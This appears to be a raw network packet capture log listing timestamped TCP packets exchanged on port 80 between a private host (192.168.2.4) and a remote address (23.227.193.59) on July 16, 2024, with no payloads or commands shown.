                                                                            Jul 16, 2024 22:29:50.578108072 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.578125954 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.578140974 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.578174114 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.578181982 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.578206062 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.578239918 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.578253984 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.578273058 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.578305960 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.578319073 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.578334093 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.578367949 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.578377962 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.578401089 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.578438044 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.578449965 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.578475952 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.578507900 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.578526974 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.578541994 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.578574896 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.578584909 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.578607082 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.578635931 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.578655005 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.578669071 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.578702927 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.578710079 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.578736067 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.578769922 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.578782082 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.578816891 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.578850031 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.578857899 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.578886032 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.578927994 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.578938007 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.578970909 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.579004049 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.579019070 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.579039097 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.579071999 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.579080105 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.579121113 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.579163074 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.579171896 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.579195976 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.579231024 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.579242945 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.579263926 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.579298019 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.579305887 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.579330921 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.579364061 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.579371929 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.579396963 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.579430103 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.579436064 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.579463959 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.579499006 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.579509020 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.579529047 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.579564095 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.579570055 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.634833097 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.663049936 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.663094044 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.663149118 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.663151026 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.663187981 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.663223028 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.663238049 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.663275957 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.663310051 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.663324118 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.663363934 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.663410902 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.663418055 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.663455009 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.663487911 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.663502932 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.663537979 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.663570881 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.663584948 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.663606882 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.663640976 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.663652897 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.663677931 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.663726091 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.664006948 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.664061069 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.664093971 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.664112091 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.664146900 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.664180040 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.664196014 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.664213896 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.664248943 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.664259911 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.664282084 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.664329052 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.664365053 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.664393902 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.664443016 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.664458990 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.664525032 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.664561033 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.664573908 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.664601088 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.664633036 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.664650917 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.664668083 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.664715052 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.664762974 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.664797068 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.664829969 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.664841890 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.664865971 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.664912939 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.665061951 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.665093899 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.665126085 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.665139914 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.665159941 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.665195942 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.665209055 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.665230036 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.665263891 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.665276051 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.665298939 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.665344954 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.665393114 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.665445089 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.665492058 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.665935993 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.665970087 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.666004896 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.666011095 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.666086912 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.666120052 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.666136026 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.666155100 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.666188955 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.666202068 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.666354895 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.666388035 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.666404009 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.666423082 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.666455984 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.666471004 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.666491985 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.666524887 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.666538000 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.666636944 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.666671038 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.666683912 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.666704893 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.666742086 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.666754961 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.666776896 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.666810036 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.666824102 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.666843891 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.666877031 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.666889906 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.666913986 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.666960001 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.667186975 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.667220116 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.667253971 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.667268991 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.667289972 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.667323112 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.667336941 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.667356014 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.667388916 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.667398930 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.667427063 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.667480946 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.667632103 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.667665005 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.667699099 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.667718887 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.667732000 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.667764902 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.667779922 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.667799950 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.667831898 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.667844057 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.667869091 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.667917967 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.668179989 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.668214083 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.668246031 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.668265104 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.668278933 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.668313026 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.668327093 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.668345928 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.668379068 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.668392897 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.668411970 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.668445110 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.668459892 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.668505907 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.668541908 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.668554068 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.668572903 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.668607950 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.668621063 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.668637991 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.668670893 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.668679953 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.668704987 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.668737888 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.668751001 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.669091940 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.669126034 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.669141054 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.669159889 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.669193029 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.669205904 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.669226885 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.669260979 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.669274092 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.669294119 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.669327021 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.669343948 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.669359922 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.669393063 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.669409037 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.669428110 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.669461966 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.669476032 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.669495106 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.669528961 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.669542074 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.712892056 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.752033949 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.752108097 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.752144098 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.752194881 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.752193928 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.752233028 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.752259016 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.752269030 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.752337933 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.752348900 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.752382994 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.752415895 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.752440929 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.752449989 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.752500057 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.752500057 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.752532959 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.752566099 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.752587080 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.752599955 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.752635956 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.752660036 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.752851963 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.752902985 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.752934933 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.752969027 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.753021002 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.753047943 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.753082037 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.753114939 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.753149986 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.753154993 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.753201008 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.753216028 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.753247976 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.753298998 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.753298998 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.753334045 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.753366947 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.753382921 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.753401041 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.753434896 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.753444910 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.753709078 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.753741980 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.753757000 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.753776073 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.753808022 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.753822088 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.753842115 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.753875017 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.753894091 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.753917933 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.753946066 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.753962994 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.754095078 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.754128933 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.754143000 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.754163027 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.754195929 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.754209042 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.754230022 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.754261017 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.754276037 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.754296064 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.754331112 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.754340887 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.754730940 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.754762888 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.754776001 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.754798889 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.754847050 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.754849911 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.754884005 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.754918098 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.754930973 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.754952908 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.755007982 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.755064011 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.755095959 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.755130053 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.755150080 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.755325079 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.755357027 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.755373955 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.755388975 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.755422115 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.755438089 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.755455971 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.755489111 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.755501986 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.755522966 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.755558968 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.755568981 CEST4973080192.168.2.423.227.193.59
